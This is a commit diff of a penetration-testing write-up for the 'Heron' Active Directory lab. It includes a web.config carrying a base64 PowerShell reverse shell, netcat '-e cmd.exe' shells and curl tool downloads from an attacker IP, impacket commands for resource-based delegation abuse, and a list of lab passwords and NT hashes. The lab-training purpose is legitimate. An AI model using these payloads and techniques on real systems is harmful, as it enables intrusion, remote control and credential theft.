Update Heron.md

This commit is contained in:
ARZ 2024-10-03 10:27:50 +03:00 committed by GitHub
parent bb4a110936
commit 4277791e6c
No known key found for this signature in database
GPG key ID: B5690EEEBB952194

View file

@ -86,14 +86,151 @@ proxychains nxc smb 10.10.196.37 -u 'samuel.davies' -p 'pass' -M gpp_password
<img src="https://i.imgur.com/8tWxHyt.png"/>
Checking the access on smb shares with svc-web-account-d, there's write access on accounting share
Checking the access on smb shares with svc-web-accounting-d, there's write access on accounting share
<img src="https://i.imgur.com/jdFb9mk.png"/>
The accounting share has the application files including the web.config
The accounting share has the application files including the `web.config `
<img src="https://i.imgur.com/j3gUK7E.png"/>
Since we have write access to web.config we can edit that and execute system commands through `AspNetCoreModule` but this method is destructive as it replaces the config file and can cause application to not function as in this scenario the application is working through the use of AccountingApp.dll in the config file
<img src="https://i.imgur.com/dTVXLD7.png"/>
But before we attempt this we need to first figure out where config is being hosted as from the previous website we found it wasn't there, from the share name this hints us to use `accounting` as vhost
<img src="https://i.imgur.com/bByZgdr.png"/>
This site will ask for credentials where svc-web-accounting-d's creds will work
<img src="https://i.imgur.com/oroItJF.png"/>
The data here was being reflected from the dll which can be analyzed by either ILSpy or DNSpy
<img src="https://i.imgur.com/OkfJX09.png"/>
<img src="https://i.imgur.com/aWJhGak.png"/>
Following this article https://soroush.me/blog/tag/rce/, to replace the path with any which does not exist, changing the processpath to be powershell and in the arguments placing base64 encoded reverse shell to receive on jump server
<img src="https://i.imgur.com/kacFSP8.png"/>
<img src="https://i.imgur.com/vyCERnC.png"/>
```
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<location path="." inheritInChildApplications="false">
<system.webServer>
<handlers>
<add name="aspNetCore" path="execute.now" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
</handlers>
<aspNetCore processPath="powershell" arguments="-e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADAALgAxADMANgAiACwAMgAyADIAMgApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=" hostingModel="OutOfProcess" />
</system.webServer>
</location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->
```
Now deleting the web.config and replacing it with our modified one then making a request to the webpage with `/execute.now`
<img src="https://i.imgur.com/e4jyVYY.png"/>
<img src="https://i.imgur.com/IYDQCas.png"/>
<img src="https://i.imgur.com/m9qh793.png"/>
After getting a shell, running bloodhound to enumerate the domain
```
proxychains bloodhound-python -d 'heron.vl' -u 'svc-web-accounting-d' -p 'password' -c all -ns 10.10.237.21
```
<img src="https://i.imgur.com/F7raG3r.png"/>
But from bloodhound, it didn't showed any path leading to privilege escalation/lateral movement
<img src="https://i.imgur.com/yUElxoT.png"/>
Enumerating C:\Windows, we'll find `scripts` folder which is unusal to be there, ssh. ps1 file
having creentials to` _local ` user
<img src="https://i.imgur.com/GiXw3j2.png"/>
Switching to user and escalating privileges to root user
<img src="https://i.imgur.com/Rsjmyvy.png"/>
From here we can only do much about reading the NThash of frajmp from /etc/krb5.keytab
<img src="https://i.imgur.com/DFlX3c7.png"/>
Since we have password of ` _local`, we can try password spraying on domain users which will work on `Julian.Pratt`
<img src="https://i.imgur.com/OY5Jk22.png"/>
We can't login directly on domain controller since it requires non admins to be in remote desktop group, home directory can be access through `home$` share
<img src="https://i.imgur.com/LBQs4SY.png"/>
From here we can grab the shortcut files for putty sessions from where we'll get the password of `adm_prju`
<img src="https://i.imgur.com/bb5nLeh.png"/>
Checking for paths for gaining domain, this user is in `Admins_T1` group which has `WriteAccountRestrictions` acl on domain controller, which essentially is similar to GenericWrite or WriteProperty that can allow to edit `msDS-AllowedToActOnBehalfOfOtherIdentity` adding a machine account for which we have password for abusing resource based delegaiton (RBCD)
<img src="https://i.imgur.com/Yb1qjnq.png"/>
We can do this attack in two ways, since we have the NThash of frajmp, we can append that account in dc's property or we can utilize a user account without having any SPN by replacing the password with it's TGT session and combining S4U2Self and U2U protocols to abuse but this method is quite destructive and must be avoided only if there's a test account
Going with the machine account approach, by first editing the property
```bash
proxychains impacket-rbcd -delegate-from 'FRAJMP$' -delegate-to 'MUCDC$' -dc-ip '10.10.153.149' -action 'write' 'heron.vl'/'adm_prju':'passowrd'
```
<img src="https://i.imgur.com/5JTpH30.png"/>
```bash
proxychains impacket-getST -spn 'cifs/MUCDC' -impersonate _admin -dc-ip '10.10.153.149' 'heron.vl/frajmp$' -hashes ':hash'
```
<img src="https://i.imgur.com/pwST8pB.png"/>
<img src="https://i.imgur.com/3evqV6D.png"/>
# References
- https://www.hackingarticles.in/credential-dumping-group-policy-preferences-gpp/
- https://github.com/t0thkr1s/gpp-decrypt
- https://soroush.me/blog/tag/rce/
- https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd
- https://github.com/sosdave/KeyTabExtract
```
pentest:Heron123!
samuel.davies:l6fkiy9oN
svc-web-accounting-d:H3r0n2024#!
_local:Deplete5DenialDealt
Julian.Pratt:Deplete5DenialDealt
curl 10.8.0.136:8080/nc64.exe -o nc.exe
curl 10.8.0.136/winPEASx64.exe -o win.exe
.\nc.exe 10.8.0.136 3333 -e cmd.exe
curl 10.8.0.136/RunasCs.exe -o RunasCs.exe
.\RunasCs.exe Julian.Pratt 'Deplete5DenialDealt' -d heron.vl 'C:\webaccounting\nc.exe 10.8.0.136 3333 -e cmd.exe' -l 9
FRAJMP$:6f55b3b443ef192c804b2ae98e8254f7
Set-ADComputer MUCJMP -PrincipalsAllowedToDelegateToAccount FRAJMP$
Get-ADComputer MUCJMP -Properties PrincipalsAllowedToDelegateToAccount
adm_prju@mucjmp:ayDMWV929N9wAiB4&
evil-winrm -i 10.10.217.85 -u _admin -H 3998cdd28f164fa95983caf1ec603938
```